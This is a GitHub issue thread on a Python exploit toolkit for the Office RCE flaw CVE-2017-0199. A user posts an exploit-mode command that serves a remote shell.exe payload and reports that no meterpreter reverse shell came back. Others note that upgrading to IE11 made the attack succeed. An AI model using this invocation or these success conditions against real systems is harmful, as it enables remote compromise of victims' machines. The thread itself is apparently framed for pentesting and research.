bhdresh / CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v4.0 is a handy Python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver a Metasploit / meterpreter / other payload to the victim without any complex configuration.

Not executing payload #23

Closed xillwillx closed 7 years ago

xillwillx commented 7 years ago

root@kali:~/Desktop/CVE-2017-0199# python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.101/shell.exe -l /tmp/shell.exe
Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect
Server Running on : 80
Received GET method from 192.168.1.115

Nothing pulling the meterpreter reverse TCP; tried on Win7 with a fresh install and Office 2013.

xillwillx commented 7 years ago

Disregard, read the other issues posted prior. Looks like a fresh install of Win7 is not affected: https://www.youtube.com/watch?v=ac6LM7WAx64

Updated to IE11 on Win7 and the code works.

Windogeabella commented 7 years ago

Umm, can you tell me how you did it?

bhdresh commented 7 years ago

@xillwillx, I hope you were able to deliver the payload by upgrading IE.

xillwillx commented 7 years ago

@bhdresh yep, worked right away, so I'm assuming an update also updates mshta.exe to allow this to work.

@Windogeabella I'm just wrapping up an article on a complete walkthrough using this code and Metasploit, and also manually creating your own weaponized RTF file from scratch.